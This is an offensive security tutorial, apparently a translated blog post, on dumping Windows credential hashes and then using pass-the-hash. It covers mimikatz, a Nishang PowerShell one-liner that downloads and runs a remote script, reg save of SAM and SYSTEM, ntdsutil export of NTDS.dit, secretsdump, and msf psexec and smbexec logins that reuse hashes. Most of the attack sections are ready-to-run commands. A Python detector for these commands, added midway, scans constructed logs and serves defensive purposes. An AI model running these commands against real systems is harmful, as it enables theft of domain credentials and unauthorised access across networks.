[Intranet Penetration] Hash acquisition and Pass-The-Hash

0x01 PTH Overview

PTH, that is, Pass-The-Hash. First, why pass the hash at all? For one thing, on targets running Windows Server 2012 or later the lsass.exe process no longer holds clear-text passwords; for another, as security awareness improves, weak passwords are becoming rarer, and we often end up with a hash that cannot be cracked. In short: with only the hash, we can still log in normally.

The most interesting part of a PTH attack is not the process of passing the hash, but the process of obtaining it, so roughly 90% of what follows is about hash acquisition.

0x02 Hash acquisition

Hash acquisition on an ordinary PC

2.1 mimikatz

The classic tool is mimikatz. Note: you must first have local administrator privileges to run it.

privilege::debug
sekurlsa::logonpasswords

2.2 Nishang

The representative PowerShell framework, which can also obtain hashes:

powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.15.216:8888/Gather/Get-PassHashes.ps1');Get-PassHashes

2.3 The fully functional msf

Next, let's sort out how many hash acquisition methods msf supports:

1. Its own post-exploitation modules

hashdump
run hashdump
run post/windows/gather/smart_hashdump

2. Besides meterpreter's built-in commands, you can also obtain hashes by loading mimikatz:

load mimikatz (required, otherwise the following commands are unavailable)
msv
tspkg
wdigest
kerberos
ssp

Each command above corresponds to one credential field; ssp deserves particular attention, since what it records is the ipc$ password.

Some of mimikatz's native commands do not apply here, but remember the hash acquisition command:

mimikatz_command -f samdump::hashes

2.4 Getting hashes from the SAM table

Export the SAM data:

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

Use mimikatz to extract the hashes:

lsadump::sam /sam:SAM /system:SYSTEM

Hash acquisition in a domain

First of all, the idea is the same as getting hashes on an ordinary PC, but with a difference: you have to know two things.

  • Even on a DC, the conventional approach to getting hashes still only yields local user hashes, not the hashes of every user in the domain. Of course, you can still obtain a domain administrator's hash, which does have the right to log in across the entire domain.

  • Even on a user's machine within the domain, the conventional approach is still likely to yield a domain administrator's hash: as long as a domain administrator has logged in via RDP, their hash will be saved in lsass.

2.5 Getting domain hashes from NTDS.dit on the domain controller

This idea is particularly important in domain penetration, because NTDS.dit holds the hashes of all domain users; of course, the idea only works on the DC.

Manually export NTDS.dit and the SYSTEM hive, then extract the hashes either on the target machine or locally; bear in mind that if the domain is large enough, the file will be particularly large.

Besides locating the file path manually, you can use the following export command:

ntdsutil "ac i ntds" ifm "create full c:\users\tmp" q q

There are only a few domain users here, yet the file is already 36M.

Next we need to extract the user hashes; NTDSDumpEx is recommended:

Tool address: https://github.com/zcgonvh/NTDSDumpEx/releases

NTDSDumpEx -d ntds.dit -s system -o domain.txt

Similarly, another recommended tool is secretsdump, part of impacket, the Python third-party library we have mentioned repeatedly.

python secretsdump.py -system SYSTEM -ntds ntds.dit local

2.6 Exporting domain hashes directly with the secretsdump script

Why mention secretsdump again? Because it can export the domain hashes directly; plainly put, it automates the manual steps above. It is kept for last so that everyone understands how the process works.

python secretsdump.py rabbitmask:[email protected]

First it dumps the hashes in the local SAM, then the hashes of all domain users; all of it succeeds.
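As an added defensive example (not code from the original post), the following Python scans constructed process-creation records for the command lines used in 2.1 to 2.5: the ntdsutil IFM export, reg save of SAM/SYSTEM, the mimikatz dump modules and a remotely loaded Get-PassHashes. The log format, hostnames, users and timestamps are assumptions.

```python
import re

# Signatures for the credential-dumping commands discussed above, matched
# case-insensitively against the full command line of a new process.
DUMP_SIGNATURES = {
    "ntds_ifm_export": re.compile(r"\bntdsutil\b.*\bifm\b.*\bcreate\s+full\b", re.I),
    "reg_save_sam_system": re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system)\b", re.I),
    "mimikatz_dump": re.compile(r"sekurlsa::logonpasswords|lsadump::sam|samdump::hashes", re.I),
    "nishang_get_passhashes": re.compile(r"DownloadString\(.*\bGet-PassHashes\b", re.I),
}

# Assumed record layout, one per line: "<date> <time> host=<h> user=<u> cmd=<command line>"
RECORD_RE = re.compile(r"^(?P<ts>\S+ \S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

# Constructed sample records (hypothetical hosts and users, not real telemetry).
SAMPLE_LOG = r"""
2019-11-23 10:01:12 host=DC01 user=CORP\svc_backup cmd=ntdsutil.exe "ac i ntds" ifm "create full c:\users\tmp" q q
2019-11-23 10:02:40 host=WS07 user=CORP\alice cmd=notepad.exe C:\Users\alice\report.txt
2019-11-23 10:03:05 host=WS07 user=WS07\admin cmd=reg.exe save HKLM\SAM SAM
2019-11-23 10:03:06 host=WS07 user=WS07\admin cmd=reg.exe save HKLM\SYSTEM SYSTEM
2019-11-23 10:05:11 host=WS03 user=CORP\bob cmd=powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.15.216:8888/Gather/Get-PassHashes.ps1');Get-PassHashes
2019-11-23 10:05:40 host=WS03 user=CORP\bob cmd=mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
2019-11-23 10:06:30 host=DC01 user=CORP\svc_backup cmd=reg.exe query HKLM\SOFTWARE\Microsoft
"""

def parse_record(line):
    """Parse one record into a dict; return None for lines that do not fit the layout."""
    m = RECORD_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(cmd):
    """Return the names of every dump signature that matches a command line."""
    return [name for name, rx in DUMP_SIGNATURES.items() if rx.search(cmd)]

def scan_log(text):
    """Scan a multi-line log and return one finding per (record, matching signature)."""
    findings = []
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue  # blank or malformed line
        for technique in classify(rec["cmd"]):
            findings.append({"ts": rec["ts"], "host": rec["host"], "user": rec["user"],
                             "technique": technique, "cmd": rec["cmd"]})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} {f['user']}: {f['technique']} <- {f['cmd']}")
```

The benign notepad and reg query records produce no findings; in a real deployment the command line would come from Windows event 4688 or Sysmon event 1 rather than the constructed layout used here.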

0x03 Passing the hash

3.1 The msf psexec module

use exploit/windows/smb/psexec
set rhosts 192.168.15.181
set smbuser rabbitmask
set smbpass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4

3.2 impacket smbexec

python smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4 [email protected]

or

python smbexec.py -hashes :0515322a55615056aaabb044a48463a4 [email protected]

0x04 Reference Links

https://www.freebuf.com/articles/system/217681.html


Source: www.cnblogs.com/-mo-/p/11923761.html